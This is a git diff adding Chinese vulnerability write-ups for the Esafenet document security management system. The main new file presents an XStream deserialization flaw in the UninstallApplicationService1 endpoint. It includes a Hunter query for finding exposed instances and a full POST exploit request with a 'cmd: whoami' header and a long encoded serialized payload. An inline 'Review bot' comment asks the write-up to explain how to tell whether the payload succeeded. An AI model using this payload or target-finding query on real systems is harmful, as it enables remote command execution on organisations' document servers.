HOGGDIBIOBCKFHLFILPBOMCENKMNEDOHKKHEGLDAAPLGAPKCDOEDEPIAFLMCOGLAOELIAMBLFPHAAMOIHNLGGIKFFCDJIKILNHOMONKLIIFPHBGKJIPGFENEJHJGKPEIGDIODANABHHPKKAAFJNBHIDNDJGEJEJCJPFPBMFGDCLCNBDCBEICFKEIDEDGBEMLPDKJLCKBOHCOAIJHNPAIECLBJJDGELKEJHMCFKLLOMPFNJFKFEAILKDJJKDLOOOOHAJOIHJGGCPJJDCBMGPMOGIMFHFMMIEGKMLMNAMFCACOCPLAFCJPDIEFJNGHMDKJHKKBEBOFBACJINKJKIGJKFKGLMLMKDNFMMMNEHPKFGFOILIOGEELJKEHPHOLMDAIPLOILNEEDPCBMOGONDCGKMAGHPBMIENCDEOLFADDFNJJCPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLENJJHKMNFBPELLCHODKDMINFDIILDGAHKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEMBFGIACAKNFCHHFJJPGGFNKIMFFDJGFNFHJEGMAJEBOJGFDDFJJDGJKPIDNFKIKCKPBEMINOGDILOHHHFPPCKKLEDFIOEEODPCINAKJDCIBJNNMLOICFPIFCOJBHGBFCOBFGJLMONDMFDBFIOBANPKLDIDCJKLIBHDJJPINOGCEKBIPKAHCJOOLADCDAEHKDKOJDKNPDEDICENMLHDKDPBNJLGDIILAJFFHBOEAKKENDBOHDCLPHJAKKAEJNMLFLFOGCFKGGGMEDGCFBGMFLCD +``` + +![1704466134305-cdd12d0e-c56e-43f4-b7c5-4c0ab6461190.png](./img/Ee_yrEjypi5abc_7/1704466134305-cdd12d0e-c56e-43f4-b7c5-4c0ab6461190-802984.png) + +```java +/CDGServer3/stc.jsp +``` + +![1704466164173-6e8f908f-a555-4903-8ddf-818a72e8f11a.png](./img/Ee_yrEjypi5abc_7/1704466164173-6e8f908f-a555-4903-8ddf-818a72e8f11a-995129.png) + + + +> 更新: 2024-04-20 22:01:34 +> 原文: 
<https://www.yuque.com/xiaokp7/ocvun2/wg0flo918othfwbw> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统UninstallApplicationService1存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统UninstallApplicationService1存在xstream反序列化漏洞.md new file mode 100644 index 0000000..ee89021 --- /dev/null +++ b/亿赛通电子文档安全管理系统UninstallApplicationService1存在xstream反序列化漏洞.md 
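Review bot: the second fence in this file is tagged ```java but holds only the request path `/CDGServer3/stc.jsp`, not Java; tag it `plain` like the request block above it so it matches the rest of the write-ups. The surrounding text also never says what `stc.jsp` is for at this point of the procedure, i.e. whether it is the step that confirms the payload landed or where the command output is read back; add one sentence stating what the screenshot after it is expected to show, otherwise a reader cannot tell success from failure.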
@@ -0,0 +1,36 @@ +# 亿赛通电子文档安全管理系统UninstallApplicationService1存在xstream 反序列化漏洞 + +# 一、漏洞简介 + 亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。亿赛通电子文档安全管理系统UninstallApplicationService1存在xstream 反序列化漏洞 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/k6HgGvFP2_AD6epE/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-193286.png) + +# 四、漏洞复现 +```plain +POST /CDGServer3/UninstallApplicationService1 HTTP/1.1 +Accept: */* +User-Agent: Mozilla/5.0 +Connection: close +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.8 +Content-Type: text/xml +Host: 192.168.110.187:8090 +cmd: whoami +Content-Length: 14756 + +NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKEL
DPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIK
DOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGC
NPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBE
BMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIP
JNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNP
HHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABH
